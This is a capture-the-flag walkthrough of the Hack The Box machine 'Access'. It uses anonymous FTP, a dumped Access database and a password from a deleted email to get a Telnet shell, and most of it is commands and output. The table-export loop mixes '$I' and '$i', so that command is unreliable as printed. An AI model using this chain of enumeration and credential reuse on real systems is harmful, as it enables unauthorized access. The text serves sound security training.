Exercise: Enumerating and exploiting FTP and Telnet on Hack The Box case machine Access
Access is a Windows box that has an FTP server on which you will find a backup of an MS Access database and a password-protected ZIP file containing a backup of a Microsoft Outlook email file. Dumping the Access database give server usernames and passwords, one of which can be used to unzip the ZIP file. Viewing the emails in the PST file found there, gives another password that can be used to gain access via Telnet.
An nmap scan shows that the TCP ports 21 (FTP), 23 (Telnet) and 80 (HTTP) are open. Nmap tells you that anonymous login is allowed on FTP.
┌─[✗]─[rin@parrot]─[~/boxes/Access]
└──╼ $sudo nmap -v -sC -sV -T4 --min-rate 1000 -p- access.htb -oA nmap/full-tcp
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
On logging in with user anonymous, password anonymous, you find 2 directories, "Backups" and "Engineer". The Backups directory contains an mdb file which indicates that it is a backup of an Access database file. The Engineer directory contains a zip file named "Access Control.zip".
To download everything to our machine, we can use wget from our local machine:
┌─[rin@parrot]─[~/boxes/Access/FTP]
└──╼ $wget -r --no-passive-ftp ftp://anonymous:[email protected]
--2021-02-28 14:58:13-- ftp://anonymous:*password*@access.htb/
=> ‘access.htb/.listing’
Resolving access.htb (access.htb)... 10.129.105.84
Connecting to access.htb (access.htb)|10.129.105.84|:21... connected.
Logging in as anonymous ... Logged in!
<SNIP>
The -r flag tells wget to do a recursive fetch which goes into every directory and fetches the contents. The --no-passive-ftp flag tells wget not to try and download files using passive mode. If you try and run the command without the --no-passive-ftp flag, wget will try and establish passive mode and fail, aborting the command.
Once the command completes, you will have the following on your local disk:
┌─[rin@parrot]─[~/boxes/Access/FTP]
└──╼ $tree access.htb
access.htb
├── Backups
│ └── backup.mdb
└── Engineer
└── Access Control.zip
2 directories, 2 files
If you try and unzip Access Control.zip, it will give an error saying that it can't unzip because the zip file uses "unsupported compression method 99" which means that it was zipped using 7-Zip. If you try 7z on it, you will be prompted for a password. So leaving that for the moment, you can explore the access database backup using mdbtools.
mdbtools can be installed with:
sudo apt install mdbtoolsCreate a directory called tables and move backup.mdb into it then run:
for I in $(mdb-tables backup.mdb);do mdb-export backup.mdb $i > $i;done
This script will get each table name and then export the contents of the table, saving it to a file named using the table name. Most of the tables are empty and you can sort the files by line count using:
wc -l * | sort -n
On looking at the files with more than 2 lines, you will notice a table called auth_user:
┌─[✗]─[rin@parrot]─[~/boxes/Access/tables]
└──╼ $cat auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
The first thing to try is the engineer password on the zip file:
┌─[rin@parrot]─[~/boxes/Access/access.htb/Engineer]
└──╼ $7z x 'Access Control.zip'
7-Zip [64] 16.02 : Copyright I 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_AU.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs IntelI CoreI i9-9980HK CPU @ 2.40GHz (906ED),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
The pst file is a Microsoft Outlook email file that can be read using the program "readpst". Running this on "Access Control.pst" will extract an mbox file. With cat, the contents reveal an email that is in the "Deleted Items" folder. This email is from joh[email protected] to [email protected] saying that:
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
You can then use the username security and password 4Cc3ssC0ntr0ller to telnet onto the box:
┌─[✗]─[rin@parrot]─[~/boxes/Access]
└──╼ $telnet access.htb
Trying 10.129.45.60...
Connected to access.htb.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security
C:\Users\security>
It won't be long before you notice that the shell that Telnet provides is limited. The arrow keys don't work and nor does the delete key. Output is not formatted correctly. This is a very good example of where the shell is not a full TTY. You can improve things by running a Nishang PowerShell reverse shell, but I will leave this here for the moment and come back later when I discuss privilege escalation and persistence.